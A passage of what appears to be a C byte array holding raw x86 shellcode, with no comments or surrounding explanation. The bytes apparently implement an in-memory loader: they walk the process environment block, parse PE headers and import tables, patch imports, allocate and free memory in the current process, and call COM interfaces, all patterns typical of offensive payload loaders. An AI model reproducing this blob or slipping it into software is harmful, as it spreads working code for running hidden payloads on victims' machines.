1192 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x40,
1193 0x22, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x41,
1194 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
1195 0x04, 0x89, 0x04, 0x24, 0xe8, 0x5b, 0x22, 0x00, 0x00, 0xeb, 0x2b, 0x90,
1196 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90, 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90,
1197 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90,
1198 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90,
1199 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f,
1200 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0xa8, 0x00, 0x00, 0x00, 0x8b,
1201 0x45, 0x08, 0x05, 0x44, 0x04, 0x00, 0x00, 0x89, 0x45, 0xf4, 0xc7, 0x45,
1202 0xf0, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xf0, 0x8b, 0x45,
1203 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x70, 0xff, 0xff, 0xff,
1204 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b,
1205 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1206 0x74, 0x15, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1207 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x7f, 0x7e, 0xc0, 0x83,
1208 0x7d, 0xf0, 0x00, 0x74, 0x37, 0x8b, 0x45, 0xf0, 0x83, 0xc0, 0x01, 0x01,
1209 0x45, 0xf4, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x01,
1210 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8d,
1211 0x85, 0x70, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xe3, 0x1c, 0x00,
1212 0x00, 0x85, 0xc0, 0x75, 0x81, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x06,
1213 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83,
1214 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1215 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x0c, 0x00,
1216 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x71, 0x8b, 0x45, 0xf4,
1217 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00,
1218 0xc7, 0x44, 0x24, 0x10, 0x1c, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89,
1219 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b,
1220 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1221 0xff, 0xe8, 0xe3, 0x21, 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0,
1222 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45,
1223 0xe4, 0x3d, 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xec, 0x3d,
1224 0x00, 0x00, 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe8, 0x83, 0xf8, 0x04,
1225 0x75, 0x07, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00,
1226 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0x08, 0x01, 0x00,
1227 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x94, 0x18,
1228 0x00, 0x00, 0x00, 0x8b, 0x45, 0x94, 0x64, 0x8b, 0x00, 0x89, 0x45, 0x90,
1229 0x8b, 0x45, 0x90, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xc8,
1230 0x8b, 0x40, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38,
1231 0x8b, 0x55, 0x08, 0x81, 0xc2, 0x1c, 0x03, 0x00, 0x00, 0x89, 0x14, 0x24,
1232 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xc0, 0x89,
1233 0x45, 0xbc, 0x8b, 0x45, 0xbc, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1234 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0x8d, 0x50, 0x18,
1235 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x01, 0xd0,
1236 0x89, 0x45, 0xb4, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66,
1237 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1238 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
1239 0x08, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x3e,
1240 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1241 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x50, 0x0c, 0x8b,
1242 0x45, 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x55, 0xf4, 0x89, 0xd0,
1243 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45,
1244 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x08, 0xc1, 0xe8, 0x02, 0x89, 0x45, 0xf0,
1245 0xeb, 0x13, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40,
1246 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xf4, 0x72, 0x8b, 0x8b, 0x45, 0x08,
1247 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x89, 0x45, 0xb0, 0xc7, 0x45, 0xf4, 0x00,
1248 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00,
1249 0x00, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x89, 0x45, 0xe8, 0x8b,
1250 0x45, 0xe8, 0x8b, 0x40, 0x04, 0x39, 0x45, 0xb0, 0x75, 0x1d, 0x8b, 0x45,
1251 0x08, 0x8b, 0x80, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x89, 0x54,
1252 0x24, 0x04, 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1253 0x08, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b,
1254 0x45, 0xf0, 0x72, 0xb9, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x64, 0xff, 0xd0,
1255 0x89, 0x45, 0xac, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x6d,
1256 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1257 0xec, 0x01, 0xd0, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x04,
1258 0x39, 0x45, 0xac, 0x75, 0x4b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xec, 0x00,
1259 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x55,
1260 0xe8, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x55, 0x88, 0x89, 0x14, 0x24, 0xff,
1261 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00,
1262 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xc2, 0xc7, 0x44, 0x24, 0x08, 0x08,
1263 0x00, 0x00, 0x00, 0x8d, 0x45, 0x88, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1264 0x24, 0xe8, 0x50, 0x19, 0x00, 0x00, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4,
1265 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xf0, 0x72, 0x8b, 0x8b, 0x45, 0xc8,
1266 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xa4, 0x8b, 0x45, 0xa4, 0x8b, 0x40, 0x0c,
1267 0x89, 0x45, 0xe4, 0xe9, 0x95, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05,
1268 0x44, 0x03, 0x00, 0x00, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xd0, 0x01, 0x00,
1269 0x00, 0x00, 0xc7, 0x45, 0xd4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
1270 0x00, 0x00, 0x00, 0x00, 0xeb, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1271 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x07, 0xc7, 0x45, 0xd0,
1272 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1273 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x07, 0xc7, 0x45, 0xd4, 0x01, 0x00,
1274 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1275 0x00, 0x8d, 0x8d, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xf4, 0x01, 0xca,
1276 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1277 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x15, 0x8b, 0x55, 0xd8,
1278 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x06,
1279 0x83, 0x7d, 0xf4, 0x7f, 0x76, 0x94, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84,
1280 0xf4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45,
1281 0xd8, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1282 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0xc7, 0x44, 0x24,
1283 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x89,
1284 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
1285 0x24, 0xe8, 0x29, 0xcf, 0xff, 0xff, 0x89, 0x45, 0xa0, 0x83, 0x7d, 0xa0,
1286 0x00, 0x0f, 0x84, 0xa3, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xd0, 0x00, 0x74,
1287 0x4d, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xd4, 0x00, 0x74,
1288 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x98, 0x8b, 0x45, 0x98, 0xff, 0xd0,
1289 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xfe, 0xfe, 0xff,
1290 0xff, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
1291 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1292 0x84, 0xe2, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0x8c, 0x8b, 0x45, 0xe0, 0x89,
1293 0x10, 0xe9, 0xd5, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xdc,
1294 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x9c,
1295 0x8b, 0x45, 0x9c, 0xff, 0xd0, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00,
1296 0x0f, 0x84, 0xb1, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x00, 0x89,
1297 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0xfc,
1298 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x95, 0xfe, 0xff, 0xff, 0x8b, 0x45,
1299 0xe8, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xdc, 0x89, 0x10, 0xe9, 0x85, 0xfe,
1300 0xff, 0xff, 0x90, 0xe9, 0x7f, 0xfe, 0xff, 0xff, 0x90, 0x8b, 0x45, 0xe4,
1301 0x8b, 0x00, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0x85,
1302 0xc0, 0x0f, 0x85, 0x5d, 0xfe, 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00,
1303 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0x44, 0x03, 0x00, 0x00,
1304 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
1305 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c,
1306 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01,
1307 0x83, 0xd2, 0x00, 0x01, 0xc0, 0x89, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x8b,
1308 0x45, 0xf4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
1309 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85,
1310 0xec, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1311 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44,
1312 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x46, 0x1d,
1313 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x3d,
1314 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0x8b, 0x55, 0x0c,
1315 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x89, 0xd3, 0x8b, 0x95,
1316 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x4d, 0x0c, 0x81, 0xc1, 0x28, 0x05, 0x00,
1317 0x00, 0x89, 0x5c, 0x24, 0x14, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44, 0x24,
1318 0x0c, 0xff, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24,
1319 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
1320 0xff, 0xd0, 0x83, 0xec, 0x18, 0x8d, 0x45, 0x84, 0x89, 0x45, 0xb0, 0x8d,
1321 0x45, 0xb0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1322 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x89,
1323 0x45, 0xb8, 0x8d, 0x45, 0xb0, 0x83, 0xc0, 0x08, 0x89, 0x44, 0x24, 0x04,
1324 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0x06, 0x00, 0x00, 0x8d,
1325 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xc4, 0x8d, 0x45, 0xb0, 0x83,
1326 0xc0, 0x14, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1327 0xe8, 0x43, 0x08, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd8, 0x00,
1328 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
1329 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45,
1330 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x07, 0x02, 0x00, 0x00, 0x8b,
1331 0x45, 0x08, 0x8b, 0x80, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
1332 0x9a, 0xa4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x84, 0x08,
1333 0x00, 0x00, 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x5c, 0x24,
1334 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1335 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec,
1336 0x14, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0xbc, 0x01,
1337 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x55, 0x08,
1338 0x8d, 0x9a, 0xd4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xe4,
1339 0x89, 0x4c, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff,
1340 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1341 0x85, 0x63, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1342 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1343 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x30, 0x01, 0x00,
1344 0x00, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1345 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xb0, 0x89, 0x4c, 0x24,
1346 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xec,
1347 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x03, 0x01, 0x00, 0x00, 0x8b, 0x45,
1348 0x08, 0x8d, 0x90, 0xe5, 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfc, 0xff,
1349 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08,
1350 0x89, 0x04, 0x24, 0xe8, 0x07, 0xcb, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
1351 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95, 0xf2, 0xfc, 0xff, 0xff, 0x89,
1352 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45,
1353 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x20, 0x8b, 0x55, 0xe0, 0xc7, 0x44, 0x24,
1354 0x08, 0x02, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04,
1355 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x8b,
1356 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89,
1357 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1358 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1359 0x14, 0x8b, 0x8d, 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0xe4, 0xc7, 0x44,
1360 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
1361 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1362 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
1363 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1364 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1365 0x00, 0x00, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1366 0xec, 0x28, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x1e, 0x8b,
1367 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x14, 0x8b, 0x55, 0xe0, 0xc7, 0x44,
1368 0x24, 0x04, 0x02, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1369 0xec, 0x08, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1370 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1371 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x1c, 0x8b, 0x55, 0xe0, 0x89,
1372 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1373 0x8b, 0x40, 0x08, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1374 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b,
1375 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x83, 0xd2, 0x00, 0x8d,
1376 0x14, 0x00, 0x8b, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08,
1377 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
1378 0xcc, 0x13, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x00, 0x00,
1379 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1380 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x89,
1381 0x44, 0x24, 0x08, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24,
1382 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1a, 0x1a, 0x00,
1383 0x00, 0x89, 0x45, 0xf0, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1384 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0xe8, 0x61,
1385 0x10, 0x00, 0x00, 0xba, 0xec, 0x51, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1386 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x10,
1387 0xe8, 0x47, 0x10, 0x00, 0x00, 0xba, 0xcf, 0x52, 0x40, 0x00, 0xb9, 0x14,
1388 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1389 0x89, 0x50, 0x04, 0xe8, 0x2c, 0x10, 0x00, 0x00, 0xba, 0xfa, 0x52, 0x40,
1390 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1391 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x11, 0x10, 0x00, 0x00, 0xba,
1392 0x43, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1393 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xf6, 0x0f,
1394 0x00, 0x00, 0xba, 0x2d, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1395 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x10,
1396 0xe8, 0xdb, 0x0f, 0x00, 0x00, 0xba, 0x68, 0x54, 0x40, 0x00, 0xb9, 0x14,
1397 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1398 0x89, 0x50, 0x14, 0xe8, 0xc0, 0x0f, 0x00, 0x00, 0xba, 0x74, 0x54, 0x40,
1399 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1400 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x18, 0xe8, 0xa5, 0x0f, 0x00, 0x00, 0xba,
1401 0x80, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1402 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0x8a, 0x0f,
1403 0x00, 0x00, 0xba, 0xb6, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1404 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x20,
1405 0xe8, 0x6f, 0x0f, 0x00, 0x00, 0xba, 0x8c, 0x54, 0x40, 0x00, 0xb9, 0x14,
1406 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1407 0x89, 0x50, 0x24, 0xe8, 0x54, 0x0f, 0x00, 0x00, 0xba, 0x98, 0x54, 0x40,
1408 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1409 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x28, 0x8b, 0x45, 0xf4, 0xc7, 0x40, 0x04,
1410 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x55, 0x08, 0x89, 0x50,
1411 0x2c, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45,
1412 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03,
1413 0x40, 0x00, 0x80, 0xe9, 0xc3, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b,
1414 0x40, 0x2c, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
